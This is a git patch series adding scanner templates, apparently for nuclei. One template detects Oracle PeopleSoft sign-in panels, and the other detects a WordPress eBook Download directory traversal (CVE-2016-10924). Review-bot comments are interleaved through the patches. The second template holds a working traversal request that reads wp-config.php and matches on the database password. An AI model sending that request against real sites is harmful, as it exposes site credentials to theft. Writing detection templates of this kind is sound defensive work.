From e914bf88dfa641336c6150f0828cfe8122913bbd Mon Sep 17 00:00:00 2001
From: idealphase
Date: Mon, 22 Nov 2021 12:47:19 +0700
Subject: [PATCH 1/4] Added oracle-people-sign-in.yaml

Added oracle-people-sign-in.yaml
---
 exposed-panels/oracle-people-sign-in.yaml | 28 +++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 exposed-panels/oracle-people-sign-in.yaml

diff --git a/exposed-panels/oracle-people-sign-in.yaml b/exposed-panels/oracle-people-sign-in.yaml
new file mode 100644
index 0000000000..7f1d592d15
--- /dev/null
+++ b/exposed-panels/oracle-people-sign-in.yaml
@@ -0,0 +1,28 @@
+id: oracle-people-sign-in
+
+info:
+ name: Oracle Peoplesoft Sign-in
+ author: idealphase
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22
+ tags: oracle,login,panel
+
+requests:
+ - method: GET
+ redirects: true
+ max-redirects: 2
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: or
+ words:
+ - 'Oracle PeopleSoft Sign-in'
+ - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"'
+ part: body
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From c4186186028c4e34987b570f4ae6f97ff7585a43 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Wed, 24 Nov 2021 19:58:55 +0700
Subject: [PATCH 2/4] Create wordpress-ebook-download-lfi.yaml

Create wordpress-ebook-download-lfi.yaml
---
 .../wordpress-ebook-download-lfi.yaml | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml

diff --git a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
new file mode 100644
index 0000000000..0e1fb7249d
--- /dev/null
+++ b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
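Review bot: In exposed-panels/oracle-people-sign-in.yaml (PATCH 1/4) the second entry under `words` contains the first as a substring, so with `condition: or` it can never change the result and the matcher reduces to "body contains `Oracle PeopleSoft Sign-in`". That bare phrase also appears on any 200 page that merely mentions the product, so the panel detection is prone to false positives. I would keep a single entry anchored to markup, e.g. `- '<title>Oracle PeopleSoft Sign-in</title>'`, assuming the sign-in page carries that title (the Shodan title query in `reference` suggests so, but confirm against a real response). The file also ends without a trailing newline, and the same word list is carried unchanged through PATCH 4/4.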
@@ -0,0 +1,29 @@
+id: wp-ebook-download-lfi
+
+info:
+ name: Wordpress eBook Download < 1.2 - Directory Traversal
+ author: idealphase
+ severity: high
+ description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
+ - https://www.exploit-db.com/exploits/39575
+ tags: wordpress,wp-plugin,lfi,wordpress,ebook
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 566361897c8bbc96a342c6f9f3c9812e82bd720f Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 25 Nov 2021 03:21:36 +0530
Subject: [PATCH 3/4] moving template of cves folder

---
 .../2016/CVE-2016-10924.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
 rename vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml => cves/2016/CVE-2016-10924.yaml (85%)

diff --git a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml b/cves/2016/CVE-2016-10924.yaml
similarity index 85%
rename from vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
rename to cves/2016/CVE-2016-10924.yaml
index 0e1fb7249d..eb3d47e11d 100644
--- a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
+++ b/cves/2016/CVE-2016-10924.yaml
@@ -1,4 +1,4 @@
-id: wp-ebook-download-lfi
+id: CVE-2016-10924

 info:
 name: Wordpress eBook Download < 1.2 - Directory Traversal
@@ -8,7 +8,8 @@ info:
 reference:
 - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
 - https://www.exploit-db.com/exploits/39575
- tags: wordpress,wp-plugin,lfi,wordpress,ebook
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-10924
+ tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook

 requests:
 - method: GET
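Review bot: The `description` in the `info` block of wordpress-ebook-download-lfi.yaml (PATCH 2/4) is vague and disagrees with `name`: it says "Local File Inclusion" in the past tense while the name says "Directory Traversal", and it names neither the parameter nor the affected versions. Wording such as `description: WordPress eBook Download before 1.2 allows directory traversal via the ebookdownloadurl parameter of filedownload.php, exposing files such as wp-config.php.` matches what the request and matchers actually check. A positive match means the response body contains the site's database credentials, so I would also add a comment above `matchers` noting that stored responses from this template must be handled as secrets.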
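Review bot: The new `tags` line in the second hunk of PATCH 3/4 carries `cve2021`, but the template id, the target directory `cves/2016/` and the added NVD reference all say CVE-2016-10924, so the year tag should be `cve2016`: `tags: cve,cve2016,wp-plugin,lfi,wordpress,ebook`. Anyone selecting or reporting templates by year tag would otherwise find this check under 2021 and miss it under 2016. The template body continues outside the hunk.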
From 27623ba276e7ba5c1c4bed0ed0fd890b9dfa5cde Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 25 Nov 2021 03:25:14 +0530
Subject: [PATCH 4/4] updated reference to metadata

---
 exposed-panels/oracle-people-sign-in.yaml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/exposed-panels/oracle-people-sign-in.yaml b/exposed-panels/oracle-people-sign-in.yaml
index 7f1d592d15..8a0f17ca59 100644
--- a/exposed-panels/oracle-people-sign-in.yaml
+++ b/exposed-panels/oracle-people-sign-in.yaml
@@ -4,24 +4,25 @@ info:
 name: Oracle Peoplesoft Sign-in
 author: idealphase
 severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+PeopleSoft+Sign-in%22
- tags: oracle,login,panel
+ tags: oracle,panel
+ metadata:
+ shodan-query: http.title:"Oracle PeopleSoft Sign-in"

 requests:
 - method: GET
- redirects: true
- max-redirects: 2
 path:
 - '{{BaseURL}}'
+ redirects: true
+ max-redirects: 2

 matchers-condition: and
 matchers:
 - type: word
- condition: or
+ part: body
 words:
 - 'Oracle PeopleSoft Sign-in'
 - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"'
- part: body
+ condition: or

 - type: status
 status:
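Review bot: The new `shodan-query` value in PATCH 4/4 is a plain scalar with a colon and embedded double quotes; it parses only because the colon is not followed by a space, which is fragile under later edits. Single-quoting keeps it literal: `shodan-query: 'http.title:"Oracle PeopleSoft Sign-in"'`. The `name` context line still spells the product `Peoplesoft` while every other string in the file uses `PeopleSoft`. The hunk ends at `status:`, so the status list itself is outside it.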